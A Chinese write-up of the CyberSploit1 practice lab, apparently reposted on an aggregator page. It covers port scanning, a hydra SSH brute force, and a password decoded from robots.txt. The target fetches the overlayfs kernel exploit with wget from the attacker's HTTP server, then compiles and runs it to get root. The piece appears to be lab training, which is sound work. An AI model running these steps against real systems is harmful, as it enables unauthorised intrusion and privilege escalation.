当前位置: 首页 > news >正文

靶场通关记录

OSCP系列靶场-Esay-CyberSploit1

总结


getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录

提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权

准备工作


  • 启动VPN
    获取攻击机IP > 192.168.45.220

  • 启动靶机
    获取目标机器IP > 192.168.176.92

    信息收集-端口扫描


     目标开放端口收集

  • Nmap开放端口扫描2次
  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# ┌──(root㉿Kali)-[/home/bachang/Blogger]

  3. └─# sudo nmap --min-rate 10000 -p- 192.168.176.92

  4. Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST

  5. Nmap scan report for 192.168.176.92

  6. Host is up (0.30s latency).

  7. Not shown: 65533 closed tcp ports (reset)

  8. PORT STATE SERVICE

  9. 22/tcp open ssh

  10. 80/tcp open http

  11. Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

 

通过两次收集到的端口:→22,80

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92

 

信息收集-端口测试

两个端口的话,通常突破口在80端口

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(待定)

通过Nmap探测获得SSH的版本信息,可以尝试利用

  1. # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10

  2. msfconsole

  3. # 搜索对应脚本

  4. msf6 > searchsploit OpenSSH 5.9p1

貌似存在用户枚举,等没思路的时候可以来试试

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破

  1. ssh root@192.168.176.92 -p 22

  2. # 密码尝试

  3. password > root

 22-SSH弱口令爆破(挂着干别的)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22

80-HTTP端口的信息收集

访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始

信息收集-源码查看
  1. # 包括文章中是否写明一些敏感信息

  2. curl http://192.168.176.92:80

收集到一个用户名信息 itsskv

信息收集-目录扫描
信息收集-目录扫描初步
  1. dirsearch -u http://192.168.176.92:80 -x 302,403

因为扫出了目录,深层次的扫描待选

  1. 信息收集-目录扫描(后缀)

  2. 信息收集-目录扫描(深度/大字典)

  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-目录访问

/robots.txt端点访问
存在一串代码,推测是加密,带等号尝试用bashe64解密

1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

base64解密

利用kali解密得到了内容,确认是base64加密

  1. ┌──(root㉿Kali)-[/home/bachang/Blogger]

  2. └─# echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

  3. " | base64 -d

  4. cybersploit{youtube.com/c/cybersploit}

另外两个端点没东西

漏洞利用-getwebshell

信息泄露getwebshell

已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit}
头脑风暴一下,密码会不会和cybersploit{youtube.com/c/cybersploit}有关
之前hyrda可以爆破说明22端口是允许账号密码登录的

22-SSH账号密码登录(成功)

获取账号密码之后利用SSH进行登录

  1. ssh itsskv<span>@192.168.176.92</span> -p22

  2. password &gt; cybersploit (失败)

  3. password &gt; cybersploit{youtube.com/c/cybersploit}(成功)

密码真长,我真的会谢

内网遨游-getshell


FLAG1获取

  1. # 有2个,理论上排除掉第一个,找home下

  2. itsskv<span>@cybersploit-CTF</span>:~$ find / -name local.txt 2&gt;/dev/null

  3. /usr/share/checkbox/jobs/local.txt

  4. /home/itsskv/local.txt

  5. itsskv<span>@cybersploit-CTF</span>:~$ cat /home/itsskv/local.txt

  6. *********************

信息收集-内网基础信息收集

在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测操作系统的发行版本
  1. # 确定发行版本 较老

  2. itsskv<span>@cybersploit-CTF</span>:~$ lsb_release -a

  3. No LSB modules are available.

  4. Distributor ID: Ubuntu

  5. Description: Ubuntu 12.04.5 LTS

  6. Release: 12.04

  7. Codename: precise

查看内核版本信息
  1. # 确定内核版本

  2. itsskv<span>@cybersploit-CTF</span>:~$ uname -a

  3. Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

确认home目录下用户
  1. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home

  2. total 16

  3. # 有两个用户

  4. drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit

  5. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv

确认home目录下是否有隐藏文件
  1. # 例如.ssh找密码 ./*_history找历史记录等

  2. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home/itsskv

  3. # 查看了一下没啥

  4. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 .

  5. drwxr-xr-x 4 root root 4096 Jun 25 2020 ..

  6. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history

  7. -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout

  8. -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc

  9. drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache

  10. drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config

权限提升

Linux提权-内核overlayfs提权尝试

因为发行版本较老,若存在以下情况进行overlayfsLinux Kernel Version提权

系统版本
Linux Kernel Version大于3.13.0小于3.19
UbuntuLinux 15.04
UbuntuLinux 14.10
UbuntuLinux 14.10
UbuntuLinux 12.04
漏洞利用-内核overlayfs提权
  1. msfconsole

  2. msf &gt; searchsploit overlayfs

结合 3.13.0-32的版本信息选择2与3

  1. # 如果想查看msf对应的内容

  2. cat /usr/share/exploitdb/exploits/linux/local/37292.c

将文件保存在当前目录下,方便开启http服务

  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c

  3. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  4. └─# ls

  5. hydra.restore shell.c

攻击机开启服务

1.sudo python3 -m http.server 80

目标机器

  1. # 首先到具有权限的目录下 如/tmp

  2. itsskv<span>@cybersploit-CTF</span>:~$ cd /tmp

  3. # 下载

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ wget http://192.168.45.220/shell.c

  1. # 给权限

  2. itsskv<span>@cybersploit-CTF</span>:/tmp$ chmod +x shell.c

  3. # 如果是c的需要进行编译

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ gcc shell.c -o shell.c

  5. # 运行

  6. itsskv<span>@cybersploit-CTF</span>:/tmp$ ./shell.c

  7. spawning threads

  8. mount #1

  9. mount #2

  10. child threads done

  11. /etc/ld.so.preload created

  12. creating shared library

  13. # whoami

  14. root

提权成功

FLAG2获取

  1. # cat /root/proof.txt

  2. *********************

完结撒花~~~

原文地址: https://bbs.zkaq.cn/t/30873.html

相关文章:

靶场通关记录

OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP > 192.168.45.220 启动靶机 获取目标机器I…...

全网最新最全的软件测试面试题

一、前言 与开发工程师相比&#xff0c;软件测试工程师前期可能不会太深&#xff0c;但涉及面还是很广的。 在一年左右的实习生或岗位的早期面试中&#xff0c;主要是问一些基本的问题。 涉及到的知识主要包括MySQL数据库的使用、Linux操作系统的使用、软件测试框架问题、测试…...

如何列出 Ubuntu 和 Debian 上已安装的软件包

当你安装了 Ubuntu 并想好好用一用。但在将来某个时候&#xff0c;你肯定会遇到忘记曾经安装了那些软件包。 这个是完全正常。没有人要求你把系统里所有已安装的软件包都记住。但是问题是&#xff0c;如何才能知道已经安装了哪些软件包&#xff1f;如何查看安装过的软件包呢&a…...

图论---最小生成树问题

在连通网的所有生成树中&#xff0c;所有边的代价和最小的生成树&#xff0c;称为最小生成树。解决最小生成树问题一般有两种算法&#xff1a;Kruskal算法和Prim算法。 Kruskal算法 原理&#xff1a;基本思想是从小到大加入边&#xff0c;是个贪心算法。我们将图中的每个边按…...

elementplus 时间范围选择器限制选择时间范围

<el-date-pickerv-model"form.time" type"daterange"range-separator"-"start-placeholder"开始时间"end-placeholder"结束":disabled-date"disabledDate"calendar-Change"calendarChange" />co…...

【网络】抓包工具Wireshark下载安装和基本使用教程

&#x1f341; 博主 "开着拖拉机回家"带您 Go to New World.✨&#x1f341; &#x1f984; 个人主页——&#x1f390;开着拖拉机回家_Linux,大数据运维-CSDN博客 &#x1f390;✨&#x1f341; &#x1fa81;&#x1f341; 希望本文能够给您带来一定的帮助&#x1…...

Metasequoia 4 水杉3D建模工具 附序列号

Metasequoia 4是一款非常强大的3D水杉建模工具&#xff0c;它基于多边形建模技术&#xff0c;可以用于创建各种对象并支持多种第三方3DCG软件的文件格式&#xff0c;是一款非常适合从爱好到业务&#xff0c;支持3D电脑绘图&#xff0c;3D印刷&#xff0c;游戏开发等的3D建模软件…...

股票杠杆交易平台排名:淘配网推荐的十大平台

在投资世界中&#xff0c;股票杠杆交易一直以其提供更高回报机会的吸引力而备受欢迎。随着市场的不断发展&#xff0c;出现了越来越多的股票杠杆交易平台。本文将为您介绍淘配网推荐的十大股票杠杆交易平台&#xff0c;并分析它们的特点。 富灯网 - 富灯网以其全面的杠杆产品和…...

CoreData + CloudKit 在初始化 Schema 时报错 A Core Data error occurred 的解决

问题现象 如果希望为 CoreData 支持的 App 增加云数据备份和同步功能,那么 CloudKit 是绝佳的选择。CloudKit 会帮我们默默处理好一切,我们基本不用为升级而操心。 不过,有时在用本地 CoreData NSManagedObjectModel 初始化 iCloud 中的 Schema 时会发生如下错误: Error …...

修炼k8s+flink+hdfs+dlink(三:安装dlink)

一&#xff1a;mysql初始化。 mysql -uroot -p123456 create database dinky; grant all privileges on dinky.* to dinky% identified by dinky with grant option; flush privileges;二&#xff1a;上传dinky。 上传至目录/opt/app/dlink tar -zxvf dlink-release-0.7.4.t…...

Linux 系统性能瓶颈分析(超详细)

Author&#xff1a;rab 目录 前言一、性能指标1.1 进程1.1.1 进程定义1.1.2 进程状态1.1.3 进程优先级1.1.4 进程与程序间的关系1.1.5 进程与进程间的关系1.1.6 进程与线程的关系 1.2 内存1.2.1 物理内存与虚拟内存1.2.2 页高速缓存与页写回机制1.2.3 Swap Space 1.3 文件系统1…...

kafka与zookeeper的集群

基础配置 systemctl stop firewalld && systemctl disable firewalld setenforce 0 sed -i s/SELINUXenforcing/SELINUXdisabled/ /etc/selinux/configvi /etc/hosts ip1 node1 ip2 node2 ip3 node3zookeeper介绍 zookeeper是一个分布式的协调服务&#xff0c;主要用…...

sqlalchemy 连接池

报错 sqlalchemy.exc.TimeoutError: QueuePool limit of size 100 overflow 10 reached, connection timed out, timeout 30 (Background on this error at: http://sqlalche.me/e/3o7r) 查看数据库未活动超时时间 show variables like "interactive_timeout";一般…...

用Blender制作YOLO目标检测器训练数据

推荐&#xff1a;用 NSDT编辑器 快速搭建可编程3D场景 本文将介绍一种非常有吸引力的机器学习训练数据的替代方案&#xff0c;用于为给定的特定应用程序收集数据。 无论应用程序类型如何&#xff0c;这篇博文都旨在向读者展示使用 Blender 等开源资源生成合成数据&#xff08;S…...

c++视觉处理---均值滤波

均值滤波 cv::blur()函数是OpenCV中用于应用均值滤波的函数。均值滤波是一种简单的平滑技术&#xff0c;它计算每个像素周围像素的平均值&#xff0c;并用该平均值替代原始像素值。这有助于降低图像中的噪声&#xff0c;并可以模糊图像的细节。 以下是cv::blur()函数的基本用…...

QT基础入门——Qt事件(五)

前言&#xff1a; 事件&#xff08;event&#xff09;是由系统或者 Qt 本身在不同的时刻发出的。当用户按下鼠标、敲下键盘&#xff0c;或者是窗口需要重新绘制的时候&#xff0c;都会发出一个相应的事件。一些事件在对用户操作做出响应时发出&#xff0c;如键盘事件等&#x…...

自学黑客方法-----(网络安全)

如果你想自学网络安全&#xff0c;首先你必须了解什么是网络安全&#xff01;&#xff0c;什么是黑客&#xff01;&#xff01; 1.无论网络、Web、移动、桌面、云等哪个领域&#xff0c;都有攻与防两面性&#xff0c;例如 Web 安全技术&#xff0c;既有 Web 渗透2.也有 Web 防…...

Dockerfile自定义容器

1、Dockerfile Dockerfile 是用于构建 Docker 镜像的文本文件&#xff0c;其中包含一系列的指令和配置&#xff0c;用于定义镜像的构建过程。通过 Dockerfile&#xff0c;你可以定义镜像的基础操作系统、依赖、环境设置、应用程序等信息&#xff0c;从而实现可复制、自动化的镜…...

(5)SpringMVC处理携带JSON格式(“key“:value)请求数据的Ajax请求

SpringMVC处理Ajax 参考文章数据交换的常见格式,如JSON格式和XML格式 请求参数的携带方式 浏览器发送到服务器的请求参数有namevalue&...(键值对)和{key:value,...}(json对象)两种格式 URL请求会将请求参数以键值对的格式拼接到请求地址后面,form表单的GET和POST请求会…...

【iOS】——仿写计算器

文章目录 一、实现思路二、实现方法三、判错处理 一、实现思路 先搭建好MVC框架&#xff0c;接着在各个模块中实现各自的任务。首先要创建好UI界面&#xff0c;接着根据UI界面的元素来与数据进行互动&#xff0c;其中创建UI界面需要用到Masonry布局。 二、实现方法 在calcu…...

深度解析 TailGrids 3.0:现代化 React UI 库的重构之道

一、引言在前端技术高速迭代的今天&#xff0c;UI 组件库作为开发效率的核心支撑&#xff0c;正朝着 “工程化、标准化、智能化” 的方向演进。TailGrids 3.0 作为一次从内核到生态的全面重构&#xff0c;并非简单的功能迭代&#xff0c;而是深度融合 React、Tailwind CSS 与 F…...

3步快速上手Thorium浏览器:新手也能掌握的完整性能优化指南

3步快速上手Thorium浏览器&#xff1a;新手也能掌握的完整性能优化指南 【免费下载链接】thorium Chromium fork named after radioactive element No. 90. Source code and Linux releases. Windows/MacOS/ARM builds served in different repos, links are towards the top o…...

Keil5/MDK美化进阶:除了改颜色,这些隐藏的编辑器效率设置你调了吗?

Keil5/MDK美化进阶&#xff1a;解锁编辑器隐藏效率设置 第一次打开Keil5时&#xff0c;我被它那略显单调的界面震惊了——这真的是21世纪的IDE吗&#xff1f;作为一名长期使用现代编辑器的开发者&#xff0c;我几乎立刻开始寻找美化方案。但很快我发现&#xff0c;仅仅改变颜色…...

别再只用VLC看片了!手把手教你把它变成家庭流媒体服务器(支持UDP/TCP)

解锁VLC的隐藏技能&#xff1a;打造家庭专属流媒体系统的完整指南 你是否曾为在不同设备间切换观看本地视频而烦恼&#xff1f;每次都要用U盘拷贝或者忍受云盘缓慢的上传下载速度&#xff1f;其实&#xff0c;你电脑上那个熟悉的橙色锥形图标——VLC播放器&#xff0c;远比你想…...

3分钟掌握:网易云音乐无损FLAC批量下载终极指南

3分钟掌握&#xff1a;网易云音乐无损FLAC批量下载终极指南 【免费下载链接】NeteaseCloudMusicFlac 根据网易云音乐的歌单, 下载flac无损音乐到本地.。 项目地址: https://gitcode.com/gh_mirrors/nete/NeteaseCloudMusicFlac 还在为无法保存高品质音乐而烦恼吗&#x…...

别再只会用save了!Matlab fwrite函数实战:手把手教你高效读写二进制文件(附完整代码)

Matlab二进制文件高效读写指南&#xff1a;fwrite函数深度解析与实战 在数据处理领域&#xff0c;二进制文件因其紧凑性和高效性而备受青睐。对于Matlab用户而言&#xff0c;虽然save函数简单易用&#xff0c;但在处理大规模数据或需要跨平台交换时&#xff0c;fwrite函数才是…...

SDR++终极指南:如何快速掌握跨平台软件定义无线电

SDR终极指南&#xff1a;如何快速掌握跨平台软件定义无线电 【免费下载链接】SDRPlusPlus Cross-Platform SDR Software 项目地址: https://gitcode.com/GitHub_Trending/sd/SDRPlusPlus SDR软件定义无线电是一款开源的跨平台SDR软件&#xff0c;以其轻量级架构和直观界…...

告别黑盒:用Python+Wireshark抓包,手把手解析CANoe FDX协议数据交互全过程

告别黑盒&#xff1a;用PythonWireshark抓包&#xff0c;手把手解析CANoe FDX协议数据交互全过程 在汽车电子和嵌入式系统开发领域&#xff0c;CANoe作为主流的网络仿真与分析工具&#xff0c;其FDX协议提供了一种强大的跨语言数据交互能力。但对于许多开发者而言&#xff0c;协…...

告别软件模拟!用GD32F303的硬件I2C0高效读写EEPROM(附小熊派工程源码)

深入解析GD32F303硬件I2C驱动EEPROM的工程实践 在嵌入式系统开发中&#xff0c;非易失性存储是保存配置参数、运行日志等关键数据的必备功能。传统软件模拟I2C虽然实现简单&#xff0c;但在通信效率和系统资源占用方面存在明显瓶颈。本文将基于GD32F303的硬件I2C0控制器&#x…...

STM32F4当USB主机,驱动CH340串口模块的保姆级调试笔记(附源码)

STM32F4作为USB主机驱动CH340模块的深度实践指南 在嵌入式开发中&#xff0c;USB主机功能扩展串口资源是常见需求。当标准CDC类设备无法满足特殊场景时&#xff0c;驱动像CH340这样的厂商自定义设备就成了一项必备技能。本文将带您深入探索STM32F4系列微控制器作为USB主机与CH3…...